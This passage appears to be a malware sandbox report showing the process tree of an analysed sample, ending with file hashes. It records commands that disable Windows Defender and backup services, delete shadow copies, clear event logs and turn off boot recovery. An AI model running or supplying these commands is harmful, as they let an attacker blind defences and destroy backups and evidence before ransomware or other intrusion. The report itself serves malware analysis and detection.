PID:3684 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:3100
-
-
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1a9eb" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4020 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1a9eb" /y3⤵PID:4264
-
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:4152
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:4344
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:1720
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:3768
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:4828
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1796
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:4504
-
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1a9eb" start= disabled2⤵
- Launches sc.exe
PID:3500
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1208
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:3984
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4540
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:4888
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4956
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1284
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:616
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3148
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1036
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:2272
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:2308
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3960
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:1496
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:4532
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3872
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1880
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3520
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:4388
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4120
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:4304
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:3556
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:4752
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:4396
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:4848
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3264
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:2460
-
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:4936
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4704
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3772
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3136
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2792
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:860
-
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1236
-
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3068
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:344
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4428
-
-
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4592
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4060
-
-
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:4864
-
-
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:4700
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:1232
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2216
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4820
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:4148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2768
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5d28a889fd956d5cb3accfbaf1143eb6f
SHA1157ba54b365341f8ff06707d996b3635da8446f7
SHA25621e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45
SHA5120b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c